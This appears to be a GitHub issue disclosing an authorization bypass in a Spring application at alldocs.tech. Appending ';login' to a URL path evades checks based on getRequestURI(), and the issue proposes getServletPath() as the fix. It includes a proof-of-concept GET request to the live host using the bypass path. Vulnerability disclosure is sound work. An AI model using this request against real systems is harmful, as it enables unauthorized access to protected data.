You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Vulnerability Description: The Spring routing parser ignores any content after ; in the URL (e.g., /;login) when looking up routes, but request.getRequestURI() retrieves the full URI path. This can lead to permission bypasses and unauthorized operations. Fix Proposal: Use request.getServletPath() to obtain the path. /api/v1.0/statistics/recentDocs/;login
GET /api/v1.0/statistics/recentDocs/;login HTTP/1.1
Host: alldocs.tech
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: eyJhbGciO
Username: admin123
Referer: https://alldocs.tech/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
The text was updated successfully, but these errors were encountered:
Vulnerability Description: The Spring routing parser ignores any content after ; in the URL (e.g., /;login) when looking up routes, but request.getRequestURI() retrieves the full URI path. This can lead to permission bypasses and unauthorized operations.
Fix Proposal: Use request.getServletPath() to obtain the path.
/api/v1.0/statistics/recentDocs/;login
The text was updated successfully, but these errors were encountered: